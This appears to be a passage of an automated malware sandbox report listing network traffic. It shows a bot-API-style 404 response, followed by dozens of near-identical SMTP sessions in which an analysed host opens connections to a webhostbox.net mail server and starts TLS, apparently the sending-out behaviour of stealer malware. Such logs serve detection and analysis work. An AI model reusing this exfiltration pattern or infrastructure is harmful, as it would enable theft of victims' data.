                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2025-01-03 08:49:12 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                      Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                      TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                                      Jan 3, 2025 09:49:19.682791948 CET58749727208.91.199.115192.168.2.5220-bh-13.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 03 Jan 2025 14:19:19 +0530
                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                      220 and/or bulk e-mail.
                                                                                                                      Jan 3, 2025 09:49:19.684382915 CET49727587192.168.2.5208.91.199.115EHLO 642294
                                                                                                                      Jan 3, 2025 09:49:19.830878019 CET58749727208.91.199.115192.168.2.5250-bh-13.webhostbox.net Hello 642294 [8.46.123.189]
                                                                                                                      250-SIZE 52428800
                                                                                                                      250-8BITMIME
                                                                                                                      250-PIPELINING
                                                                                                                      250-PIPECONNECT
                                                                                                                      250-AUTH PLAIN LOGIN
                                                                                                                      250-STARTTLS
                                                                                                                      250 HELP
                                                                                                                      Jan 3, 2025 09:49:19.831024885 CET49727587192.168.2.5208.91.199.115STARTTLS
                                                                                                                      Jan 3, 2025 09:49:19.979749918 CET58749727208.91.199.115192.168.2.5220 TLS go ahead
                                                                                                                      Jan 3, 2025 09:49:24.682523012 CET58749758208.91.199.115192.168.2.5220-bh-13.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 03 Jan 2025 14:19:24 +0530
                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                      220 and/or bulk e-mail.
                                                                                                                      Jan 3, 2025 09:49:24.682696104 CET49758587192.168.2.5208.91.199.115EHLO 642294
                                                                                                                      Jan 3, 2025 09:49:24.830532074 CET58749758208.91.199.115192.168.2.5250-bh-13.webhostbox.net Hello 642294 [8.46.123.189]
                                                                                                                      250-SIZE 52428800
                                                                                                                      250-8BITMIME
                                                                                                                      250-PIPELINING
                                                                                                                      250-PIPECONNECT
                                                                                                                      250-AUTH PLAIN LOGIN
                                                                                                                      250-STARTTLS
                                                                                                                      250 HELP
                                                                                                                      Jan 3, 2025 09:49:24.830696106 CET49758587192.168.2.5208.91.199.115STARTTLS
                                                                                                                      Jan 3, 2025 09:49:24.982701063 CET58749758208.91.199.115192.168.2.5220 TLS go ahead
                                                                                                                      Jan 3, 2025 09:49:33.525728941 CET58749817208.91.199.115192.168.2.5220-bh-13.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 03 Jan 2025 14:19:33 +0530
                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                      220 and/or bulk e-mail.
                                                                                                                      Jan 3, 2025 09:49:33.525907993 CET49817587192.168.2.5208.91.199.115EHLO 642294
                                                                                                                      Jan 3, 2025 09:49:33.671535015 CET58749817208.91.199.115192.168.2.5250-bh-13.webhostbox.net Hello 642294 [8.46.123.189]
                                                                                                                      250-SIZE 52428800
                                                                                                                      250-8BITMIME
                                                                                                                      250-PIPELINING
                                                                                                                      250-PIPECONNECT
                                                                                                                      250-AUTH PLAIN LOGIN
                                                                                                                      250-STARTTLS
                                                                                                                      250 HELP
                                                                                                                      Jan 3, 2025 09:49:33.671677113 CET49817587192.168.2.5208.91.199.115STARTTLS
                                                                                                                      Jan 3, 2025 09:49:33.822861910 CET58749817208.91.199.115192.168.2.5220 TLS go ahead
                                                                                                                      Jan 3, 2025 09:49:44.341815948 CET58749888208.91.199.115192.168.2.5220-bh-13.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 03 Jan 2025 14:19:44 +0530
                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                      220 and/or bulk e-mail.
                                                                                                                      Jan 3, 2025 09:49:44.342014074 CET49888587192.168.2.5208.91.199.115EHLO 642294
                                                                                                                      Jan 3, 2025 09:49:44.493113995 CET58749888208.91.199.115192.168.2.5250-bh-13.webhostbox.net Hello 642294 [8.46.123.189]
                                                                                                                      250-SIZE 52428800
                                                                                                                      250-8BITMIME
                                                                                                                      250-PIPELINING
                                                                                                                      250-PIPECONNECT
                                                                                                                      250-AUTH PLAIN LOGIN
                                                                                                                      250-STARTTLS
                                                                                                                      250 HELP
                                                                                                                      Jan 3, 2025 09:49:44.493379116 CET49888587192.168.2.5208.91.199.115STARTTLS
                                                                                                                      Jan 3, 2025 09:49:44.646137953 CET58749888208.91.199.115192.168.2.5220 TLS go ahead
                                                                                                                      Jan 3, 2025 09:50:03.379810095 CET58749996208.91.199.115192.168.2.5220-bh-13.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 03 Jan 2025 14:20:03 +0530
                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                      220 and/or bulk e-mail.
                                                                                                                      Jan 3, 2025 09:50:03.379990101 CET49996587192.168.2.5208.91.199.115EHLO 642294
                                                                                                                      Jan 3, 2025 09:50:03.531239986 CET58749996208.91.199.115192.168.2.5250-bh-13.webhostbox.net Hello 642294 [8.46.123.189]
                                                                                                                      250-SIZE 52428800
                                                                                                                      250-8BITMIME
                                                                                                                      250-PIPELINING
                                                                                                                      250-PIPECONNECT
                                                                                                                      250-AUTH PLAIN LOGIN
                                                                                                                      250-STARTTLS
                                                                                                                      250 HELP
                                                                                                                      Jan 3, 2025 09:50:03.531414986 CET49996587192.168.2.5208.91.199.115STARTTLS
                                                                                                                      Jan 3, 2025 09:50:03.688810110 CET58749996208.91.199.115192.168.2.5220 TLS go ahead
                                                                                                                      Jan 3, 2025 09:50:07.396814108 CET58749997208.91.199.115192.168.2.5220-bh-13.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 03 Jan 2025 14:20:07 +0530
                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                      220 and/or bulk e-mail.
                                                                                                                      Jan 3, 2025 09:50:07.396977901 CET49997587192.168.2.5208.91.199.115EHLO 642294
                                                                                                                      Jan 3, 2025 09:50:07.547118902 CET58749997208.91.199.115192.168.2.5250-bh-13.webhostbox.net Hello 642294 [8.46.123.189]
                                                                                                                      250-SIZE 52428800
                                                                                                                      250-8BITMIME
                                                                                                                      250-PIPELINING
                                                                                                                      250-PIPECONNECT
                                                                                                                      250-AUTH PLAIN LOGIN
                                                                                                                      250-STARTTLS
                                                                                                                      250 HELP
                                                                                                                      Jan 3, 2025 09:50:07.553908110 CET49997587192.168.2.5208.91.199.115STARTTLS
                                                                                                                      Jan 3, 2025 09:50:07.704745054 CET58749997208.91.199.115192.168.2.5220 TLS go ahead
                                                                                                                      Jan 3, 2025 09:50:11.254235983 CET58749998208.91.199.115192.168.2.5220-bh-13.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 03 Jan 2025 14:20:11 +0530
                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                      220 and/or bulk e-mail.
                                                                                                                      Jan 3, 2025 09:50:11.254424095 CET49998587192.168.2.5208.91.199.115EHLO 642294
                                                                                                                      Jan 3, 2025 09:50:11.407938957 CET58749998208.91.199.115192.168.2.5250-bh-13.webhostbox.net Hello 642294 [8.46.123.189]
                                                                                                                      250-SIZE 52428800
                                                                                                                      250-8BITMIME
                                                                                                                      250-PIPELINING
                                                                                                                      250-PIPECONNECT
                                                                                                                      250-AUTH PLAIN LOGIN
                                                                                                                      250-STARTTLS
                                                                                                                      250 HELP
                                                                                                                      Jan 3, 2025 09:50:11.408097982 CET49998587192.168.2.5208.91.199.115STARTTLS
                                                                                                                      Jan 3, 2025 09:50:11.554929972 CET58749998208.91.199.115192.168.2.5220 TLS go ahead
                                                                                                                      Jan 3, 2025 09:50:15.129473925 CET58749999208.91.199.115192.168.2.5220-bh-13.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 03 Jan 2025 14:20:15 +0530
                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                      220 and/or bulk e-mail.
                                                                                                                      Jan 3, 2025 09:50:15.129688025 CET49999587192.168.2.5208.91.199.115EHLO 642294
                                                                                                                      Jan 3, 2025 09:50:15.276000023 CET58749999208.91.199.115192.168.2.5250-bh-13.webhostbox.net Hello 642294 [8.46.123.189]
                                                                                                                      250-SIZE 52428800
                                                                                                                      250-8BITMIME
                                                                                                                      250-PIPELINING
                                                                                                                      250-PIPECONNECT
                                                                                                                      250-AUTH PLAIN LOGIN
                                                                                                                      250-STARTTLS
                                                                                                                      250 HELP
                                                                                                                      Jan 3, 2025 09:50:15.276387930 CET49999587192.168.2.5208.91.199.115STARTTLS
                                                                                                                      Jan 3, 2025 09:50:15.423783064 CET58749999208.91.199.115192.168.2.5220 TLS go ahead
                                                                                                                      Jan 3, 2025 09:50:19.029740095 CET58750000208.91.199.115192.168.2.5220-bh-13.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 03 Jan 2025 14:20:18 +0530
                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                      220 and/or bulk e-mail.
                                                                                                                      Jan 3, 2025 09:50:19.029928923 CET50000587192.168.2.5208.91.199.115EHLO 642294
                                                                                                                      Jan 3, 2025 09:50:19.177452087 CET58750000208.91.199.115192.168.2.5250-bh-13.webhostbox.net Hello 642294 [8.46.123.189]
                                                                                                                      250-SIZE 52428800
                                                                                                                      250-8BITMIME
                                                                                                                      250-PIPELINING
                                                                                                                      250-PIPECONNECT
                                                                                                                      250-AUTH PLAIN LOGIN
                                                                                                                      250-STARTTLS
                                                                                                                      250 HELP
                                                                                                                      Jan 3, 2025 09:50:19.177690029 CET50000587192.168.2.5208.91.199.115STARTTLS
                                                                                                                      Jan 3, 2025 09:50:19.323895931 CET58750000208.91.199.115192.168.2.5220 TLS go ahead
                                                                                                                      Jan 3, 2025 09:50:22.913218021 CET58750001208.91.199.115192.168.2.5220-bh-13.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 03 Jan 2025 14:20:22 +0530
                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                      220 and/or bulk e-mail.
                                                                                                                      Jan 3, 2025 09:50:22.915040016 CET50001587192.168.2.5208.91.199.115EHLO 642294
                                                                                                                      Jan 3, 2025 09:50:23.064482927 CET58750001208.91.199.115192.168.2.5250-bh-13.webhostbox.net Hello 642294 [8.46.123.189]
                                                                                                                      250-SIZE 52428800
                                                                                                                      250-8BITMIME
                                                                                                                      250-PIPELINING
                                                                                                                      250-PIPECONNECT
                                                                                                                      250-AUTH PLAIN LOGIN
                                                                                                                      250-STARTTLS
                                                                                                                      250 HELP
                                                                                                                      Jan 3, 2025 09:50:23.070533037 CET50001587192.168.2.5208.91.199.115STARTTLS
                                                                                                                      Jan 3, 2025 09:50:23.219737053 CET58750001208.91.199.115192.168.2.5220 TLS go ahead
                                                                                                                      Jan 3, 2025 09:50:26.283327103 CET58750002208.91.199.115192.168.2.5220-bh-13.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 03 Jan 2025 14:20:26 +0530
                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                      220 and/or bulk e-mail.
                                                                                                                      Jan 3, 2025 09:50:26.284497023 CET50002587192.168.2.5208.91.199.115EHLO 642294
                                                                                                                      Jan 3, 2025 09:50:26.436208963 CET58750002208.91.199.115192.168.2.5250-bh-13.webhostbox.net Hello 642294 [8.46.123.189]
                                                                                                                      250-SIZE 52428800
                                                                                                                      250-8BITMIME
                                                                                                                      250-PIPELINING
                                                                                                                      250-PIPECONNECT
                                                                                                                      250-AUTH PLAIN LOGIN
                                                                                                                      250-STARTTLS
                                                                                                                      250 HELP
                                                                                                                      Jan 3, 2025 09:50:26.436363935 CET50002587192.168.2.5208.91.199.115STARTTLS
                                                                                                                      Jan 3, 2025 09:50:26.588912010 CET58750002208.91.199.115192.168.2.5220 TLS go ahead
                                                                                                                      Jan 3, 2025 09:50:30.589407921 CET58750004208.91.199.115192.168.2.5220-bh-13.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 03 Jan 2025 14:20:30 +0530
                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                      220 and/or bulk e-mail.
                                                                                                                      Jan 3, 2025 09:50:30.589556932 CET50004587192.168.2.5208.91.199.115EHLO 642294
                                                                                                                      Jan 3, 2025 09:50:30.735848904 CET58750004208.91.199.115192.168.2.5250-bh-13.webhostbox.net Hello 642294 [8.46.123.189]
                                                                                                                      250-SIZE 52428800
                                                                                                                      250-8BITMIME
                                                                                                                      250-PIPELINING
                                                                                                                      250-PIPECONNECT
                                                                                                                      250-AUTH PLAIN LOGIN
                                                                                                                      250-STARTTLS
                                                                                                                      250 HELP
                                                                                                                      Jan 3, 2025 09:50:30.736017942 CET50004587192.168.2.5208.91.199.115STARTTLS
                                                                                                                      Jan 3, 2025 09:50:30.884963989 CET58750004208.91.199.115192.168.2.5220 TLS go ahead
                                                                                                                      Jan 3, 2025 09:50:33.867153883 CET58750005208.91.199.115192.168.2.5220-bh-13.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 03 Jan 2025 14:20:33 +0530
                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                      220 and/or bulk e-mail.
                                                                                                                      Jan 3, 2025 09:50:33.867358923 CET50005587192.168.2.5208.91.199.115EHLO 642294
                                                                                                                      Jan 3, 2025 09:50:34.022022963 CET58750005208.91.199.115192.168.2.5250-bh-13.webhostbox.net Hello 642294 [8.46.123.189]
                                                                                                                      250-SIZE 52428800
                                                                                                                      250-8BITMIME
                                                                                                                      250-PIPELINING
                                                                                                                      250-PIPECONNECT
                                                                                                                      250-AUTH PLAIN LOGIN
                                                                                                                      250-STARTTLS
                                                                                                                      250 HELP
                                                                                                                      Jan 3, 2025 09:50:34.022195101 CET50005587192.168.2.5208.91.199.115STARTTLS
                                                                                                                      Jan 3, 2025 09:50:34.173085928 CET58750005208.91.199.115192.168.2.5220 TLS go ahead
                                                                                                                      Jan 3, 2025 09:50:37.309312105 CET58750007208.91.199.115192.168.2.5220-bh-13.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 03 Jan 2025 14:20:37 +0530
                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                      220 and/or bulk e-mail.
                                                                                                                      Jan 3, 2025 09:50:37.309514046 CET50007587192.168.2.5208.91.199.115EHLO 642294
                                                                                                                      Jan 3, 2025 09:50:37.455212116 CET58750007208.91.199.115192.168.2.5250-bh-13.webhostbox.net Hello 642294 [8.46.123.189]
                                                                                                                      250-SIZE 52428800
                                                                                                                      250-8BITMIME
                                                                                                                      250-PIPELINING
                                                                                                                      250-PIPECONNECT
                                                                                                                      250-AUTH PLAIN LOGIN
                                                                                                                      250-STARTTLS
                                                                                                                      250 HELP
                                                                                                                      Jan 3, 2025 09:50:37.464310884 CET50007587192.168.2.5208.91.199.115STARTTLS
                                                                                                                      Jan 3, 2025 09:50:37.610456944 CET58750007208.91.199.115192.168.2.5220 TLS go ahead
                                                                                                                      Jan 3, 2025 09:50:41.567529917 CET58750009208.91.199.115192.168.2.5220-bh-13.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 03 Jan 2025 14:20:41 +0530
                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                      220 and/or bulk e-mail.
                                                                                                                      Jan 3, 2025 09:50:41.572449923 CET50009587192.168.2.5208.91.199.115EHLO 642294
                                                                                                                      Jan 3, 2025 09:50:41.718300104 CET58750009208.91.199.115192.168.2.5250-bh-13.webhostbox.net Hello 642294 [8.46.123.189]
                                                                                                                      250-SIZE 52428800
                                                                                                                      250-8BITMIME
                                                                                                                      250-PIPELINING
                                                                                                                      250-PIPECONNECT
                                                                                                                      250-AUTH PLAIN LOGIN
                                                                                                                      250-STARTTLS
                                                                                                                      250 HELP
                                                                                                                      Jan 3, 2025 09:50:41.720510006 CET50009587192.168.2.5208.91.199.115STARTTLS
                                                                                                                      Jan 3, 2025 09:50:41.867446899 CET58750009208.91.199.115192.168.2.5220 TLS go ahead
                                                                                                                      Jan 3, 2025 09:50:44.844724894 CET58750010208.91.199.115192.168.2.5220-bh-13.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 03 Jan 2025 14:20:44 +0530
                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                      220 and/or bulk e-mail.
                                                                                                                      Jan 3, 2025 09:50:44.844961882 CET50010587192.168.2.5208.91.199.115EHLO 642294
                                                                                                                      Jan 3, 2025 09:50:44.998063087 CET58750010208.91.199.115192.168.2.5250-bh-13.webhostbox.net Hello 642294 [8.46.123.189]
                                                                                                                      250-SIZE 52428800
                                                                                                                      250-8BITMIME
                                                                                                                      250-PIPELINING
                                                                                                                      250-PIPECONNECT
                                                                                                                      250-AUTH PLAIN LOGIN
                                                                                                                      250-STARTTLS
                                                                                                                      250 HELP
                                                                                                                      Jan 3, 2025 09:50:45.000329971 CET50010587192.168.2.5208.91.199.115STARTTLS
                                                                                                                      Jan 3, 2025 09:50:45.149806976 CET58750010208.91.199.115192.168.2.5220 TLS go ahead
                                                                                                                      Jan 3, 2025 09:50:48.316262007 CET58750011208.91.199.115192.168.2.5220-bh-13.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 03 Jan 2025 14:20:48 +0530
                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                      220 and/or bulk e-mail.
                                                                                                                      Jan 3, 2025 09:50:48.316601038 CET50011587192.168.2.5208.91.199.115EHLO 642294
                                                                                                                      Jan 3, 2025 09:50:48.469990969 CET58750011208.91.199.115192.168.2.5250-bh-13.webhostbox.net Hello 642294 [8.46.123.189]
                                                                                                                      250-SIZE 52428800
                                                                                                                      250-8BITMIME
                                                                                                                      250-PIPELINING
                                                                                                                      250-PIPECONNECT
                                                                                                                      250-AUTH PLAIN LOGIN
                                                                                                                      250-STARTTLS
                                                                                                                      250 HELP
                                                                                                                      Jan 3, 2025 09:50:48.470426083 CET50011587192.168.2.5208.91.199.115STARTTLS
                                                                                                                      Jan 3, 2025 09:50:48.629125118 CET58750011208.91.199.115192.168.2.5220 TLS go ahead
                                                                                                                      Jan 3, 2025 09:50:50.223186970 CET58750012208.91.199.115192.168.2.5220-bh-13.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 03 Jan 2025 14:20:50 +0530
                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                      220 and/or bulk e-mail.
                                                                                                                      Jan 3, 2025 09:50:50.224482059 CET50012587192.168.2.5208.91.199.115EHLO 642294
                                                                                                                      Jan 3, 2025 09:50:50.375241041 CET58750012208.91.199.115192.168.2.5250-bh-13.webhostbox.net Hello 642294 [8.46.123.189]
                                                                                                                      250-SIZE 52428800
                                                                                                                      250-8BITMIME
                                                                                                                      250-PIPELINING
                                                                                                                      250-PIPECONNECT
                                                                                                                      250-AUTH PLAIN LOGIN
                                                                                                                      250-STARTTLS
                                                                                                                      250 HELP
                                                                                                                      Jan 3, 2025 09:50:50.376555920 CET50012587192.168.2.5208.91.199.115STARTTLS
                                                                                                                      Jan 3, 2025 09:50:50.528449059 CET58750012208.91.199.115192.168.2.5220 TLS go ahead
                                                                                                                      Jan 3, 2025 09:50:51.379297018 CET58750014208.91.199.115192.168.2.5220-bh-13.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 03 Jan 2025 14:20:51 +0530
                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                      220 and/or bulk e-mail.
                                                                                                                      Jan 3, 2025 09:50:51.379470110 CET50014587192.168.2.5208.91.199.115EHLO 642294
                                                                                                                      Jan 3, 2025 09:50:51.530893087 CET58750014208.91.199.115192.168.2.5250-bh-13.webhostbox.net Hello 642294 [8.46.123.189]
                                                                                                                      250-SIZE 52428800
                                                                                                                      250-8BITMIME
                                                                                                                      250-PIPELINING
                                                                                                                      250-PIPECONNECT
                                                                                                                      250-AUTH PLAIN LOGIN
                                                                                                                      250-STARTTLS
                                                                                                                      250 HELP
                                                                                                                      Jan 3, 2025 09:50:51.531191111 CET50014587192.168.2.5208.91.199.115STARTTLS
                                                                                                                      Jan 3, 2025 09:50:51.683324099 CET58750014208.91.199.115192.168.2.5220 TLS go ahead
                                                                                                                      Jan 3, 2025 09:50:55.208493948 CET58750015208.91.199.115192.168.2.5220-bh-13.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 03 Jan 2025 14:20:55 +0530
                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                      220 and/or bulk e-mail.
                                                                                                                      Jan 3, 2025 09:50:55.212884903 CET50015587192.168.2.5208.91.199.115EHLO 642294
                                                                                                                      Jan 3, 2025 09:50:55.472265005 CET58750015208.91.199.115192.168.2.5250-bh-13.webhostbox.net Hello 642294 [8.46.123.189]
                                                                                                                      250-SIZE 52428800
                                                                                                                      250-8BITMIME
                                                                                                                      250-PIPELINING
                                                                                                                      250-PIPECONNECT
                                                                                                                      250-AUTH PLAIN LOGIN
                                                                                                                      250-STARTTLS
                                                                                                                      250 HELP
                                                                                                                      Jan 3, 2025 09:50:55.472424984 CET50015587192.168.2.5208.91.199.115STARTTLS
                                                                                                                      Jan 3, 2025 09:50:55.624483109 CET58750015208.91.199.115192.168.2.5220 TLS go ahead
                                                                                                                      Jan 3, 2025 09:50:59.198458910 CET58750016208.91.199.115192.168.2.5220-bh-13.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 03 Jan 2025 14:20:59 +0530
                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                      220 and/or bulk e-mail.
                                                                                                                      Jan 3, 2025 09:50:59.199182034 CET50016587192.168.2.5208.91.199.115EHLO 642294
                                                                                                                      Jan 3, 2025 09:50:59.426522017 CET58750016208.91.199.115192.168.2.5250-bh-13.webhostbox.net Hello 642294 [8.46.123.189]
                                                                                                                      250-SIZE 52428800
                                                                                                                      250-8BITMIME
                                                                                                                      250-PIPELINING
                                                                                                                      250-PIPECONNECT
                                                                                                                      250-AUTH PLAIN LOGIN
                                                                                                                      250-STARTTLS
                                                                                                                      250 HELP
                                                                                                                      Jan 3, 2025 09:50:59.426698923 CET50016587192.168.2.5208.91.199.115STARTTLS
                                                                                                                      Jan 3, 2025 09:50:59.575850010 CET58750016208.91.199.115192.168.2.5220 TLS go ahead
                                                                                                                      Jan 3, 2025 09:51:03.067974091 CET58750017208.91.199.115192.168.2.5220-bh-13.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 03 Jan 2025 14:21:02 +0530
                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                      220 and/or bulk e-mail.
                                                                                                                      Jan 3, 2025 09:51:03.068103075 CET50017587192.168.2.5208.91.199.115EHLO 642294
                                                                                                                      Jan 3, 2025 09:51:03.220225096 CET58750017208.91.199.115192.168.2.5250-bh-13.webhostbox.net Hello 642294 [8.46.123.189]
                                                                                                                      250-SIZE 52428800
                                                                                                                      250-8BITMIME
                                                                                                                      250-PIPELINING
                                                                                                                      250-PIPECONNECT
                                                                                                                      250-AUTH PLAIN LOGIN
                                                                                                                      250-STARTTLS
                                                                                                                      250 HELP
                                                                                                                      Jan 3, 2025 09:51:03.220366955 CET50017587192.168.2.5208.91.199.115STARTTLS
                                                                                                                      Jan 3, 2025 09:51:03.372953892 CET58750017208.91.199.115192.168.2.5220 TLS go ahead
                                                                                                                      Jan 3, 2025 09:51:05.464027882 CET58750018208.91.199.115192.168.2.5220-bh-13.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 03 Jan 2025 14:21:05 +0530
                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                      220 and/or bulk e-mail.
                                                                                                                      Jan 3, 2025 09:51:05.464488029 CET50018587192.168.2.5208.91.199.115EHLO 642294
                                                                                                                      Jan 3, 2025 09:51:05.611006975 CET58750018208.91.199.115192.168.2.5250-bh-13.webhostbox.net Hello 642294 [8.46.123.189]
                                                                                                                      250-SIZE 52428800
                                                                                                                      250-8BITMIME
                                                                                                                      250-PIPELINING
                                                                                                                      250-PIPECONNECT
                                                                                                                      250-AUTH PLAIN LOGIN
                                                                                                                      250-STARTTLS
                                                                                                                      250 HELP
                                                                                                                      Jan 3, 2025 09:51:05.611155033 CET50018587192.168.2.5208.91.199.115STARTTLS
                                                                                                                      Jan 3, 2025 09:51:05.757836103 CET58750018208.91.199.115192.168.2.5220 TLS go ahead
                                                                                                                      Jan 3, 2025 09:51:08.318114996 CET58750019208.91.199.115192.168.2.5220-bh-13.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 03 Jan 2025 14:21:08 +0530
                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                      220 and/or bulk e-mail.
                                                                                                                      Jan 3, 2025 09:51:08.320481062 CET50019587192.168.2.5208.91.199.115EHLO 642294
                                                                                                                      Jan 3, 2025 09:51:08.470333099 CET58750019208.91.199.115192.168.2.5250-bh-13.webhostbox.net Hello 642294 [8.46.123.189]
                                                                                                                      250-SIZE 52428800
                                                                                                                      250-8BITMIME
                                                                                                                      250-PIPELINING
                                                                                                                      250-PIPECONNECT
                                                                                                                      250-AUTH PLAIN LOGIN
                                                                                                                      250-STARTTLS
                                                                                                                      250 HELP
                                                                                                                      Jan 3, 2025 09:51:08.472482920 CET50019587192.168.2.5208.91.199.115STARTTLS
                                                                                                                      Jan 3, 2025 09:51:08.623117924 CET58750019208.91.199.115192.168.2.5220 TLS go ahead
                                                                                                                      Jan 3, 2025 09:51:12.157396078 CET58750021208.91.199.115192.168.2.5220-bh-13.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 03 Jan 2025 14:21:12 +0530
                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                      220 and/or bulk e-mail.
                                                                                                                      Jan 3, 2025 09:51:12.157566071 CET50021587192.168.2.5208.91.199.115EHLO 642294
                                                                                                                      Jan 3, 2025 09:51:12.734368086 CET58750022208.91.199.115192.168.2.5220-bh-13.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 03 Jan 2025 14:21:12 +0530
                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                      220 and/or bulk e-mail.
                                                                                                                      Jan 3, 2025 09:51:12.734548092 CET50022587192.168.2.5208.91.199.115EHLO 642294
                                                                                                                      Jan 3, 2025 09:51:12.880764961 CET58750022208.91.199.115192.168.2.5250-bh-13.webhostbox.net Hello 642294 [8.46.123.189]
                                                                                                                      250-SIZE 52428800
                                                                                                                      250-8BITMIME
                                                                                                                      250-PIPELINING
                                                                                                                      250-PIPECONNECT
                                                                                                                      250-AUTH PLAIN LOGIN
                                                                                                                      250-STARTTLS
                                                                                                                      250 HELP
                                                                                                                      Jan 3, 2025 09:51:12.880953074 CET50022587192.168.2.5208.91.199.115STARTTLS
                                                                                                                      Jan 3, 2025 09:51:13.028126955 CET58750022208.91.199.115192.168.2.5220 TLS go ahead
                                                                                                                      Jan 3, 2025 09:51:16.137931108 CET58750023208.91.199.115192.168.2.5220-bh-13.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 03 Jan 2025 14:21:16 +0530
                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                      220 and/or bulk e-mail.
                                                                                                                      Jan 3, 2025 09:51:16.138076067 CET50023587192.168.2.5208.91.199.115EHLO 642294
                                                                                                                      Jan 3, 2025 09:51:16.288398981 CET58750023208.91.199.115192.168.2.5250-bh-13.webhostbox.net Hello 642294 [8.46.123.189]
                                                                                                                      250-SIZE 52428800
                                                                                                                      250-8BITMIME
                                                                                                                      250-PIPELINING
                                                                                                                      250-PIPECONNECT
                                                                                                                      250-AUTH PLAIN LOGIN
                                                                                                                      250-STARTTLS
                                                                                                                      250 HELP
                                                                                                                      Jan 3, 2025 09:51:16.288568020 CET50023587192.168.2.5208.91.199.115STARTTLS
                                                                                                                      Jan 3, 2025 09:51:16.439471960 CET58750023208.91.199.115192.168.2.5220 TLS go ahead
                                                                                                                      Jan 3, 2025 09:51:19.206996918 CET58750024208.91.199.115192.168.2.5220-bh-13.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 03 Jan 2025 14:21:19 +0530
                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                      220 and/or bulk e-mail.
                                                                                                                      Jan 3, 2025 09:51:19.207114935 CET50024587192.168.2.5208.91.199.115EHLO 642294
                                                                                                                      Jan 3, 2025 09:51:19.353130102 CET58750024208.91.199.115192.168.2.5250-bh-13.webhostbox.net Hello 642294 [8.46.123.189]
                                                                                                                      250-SIZE 52428800
                                                                                                                      250-8BITMIME
                                                                                                                      250-PIPELINING
                                                                                                                      250-PIPECONNECT
                                                                                                                      250-AUTH PLAIN LOGIN
                                                                                                                      250-STARTTLS
                                                                                                                      250 HELP
                                                                                                                      Jan 3, 2025 09:51:19.353418112 CET50024587192.168.2.5208.91.199.115STARTTLS
                                                                                                                      Jan 3, 2025 09:51:19.502058029 CET58750024208.91.199.115192.168.2.5220 TLS go ahead
                                                                                                                      Jan 3, 2025 09:51:23.110193014 CET58750025208.91.199.115192.168.2.5220-bh-13.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 03 Jan 2025 14:21:22 +0530
                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                      220 and/or bulk e-mail.
                                                                                                                      Jan 3, 2025 09:51:23.110328913 CET50025587192.168.2.5208.91.199.115EHLO 642294
